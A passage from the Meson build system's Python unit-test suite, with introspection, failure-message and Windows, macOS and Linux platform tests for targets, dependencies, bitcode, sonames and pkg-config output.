('is_parallel', bool),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2])}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
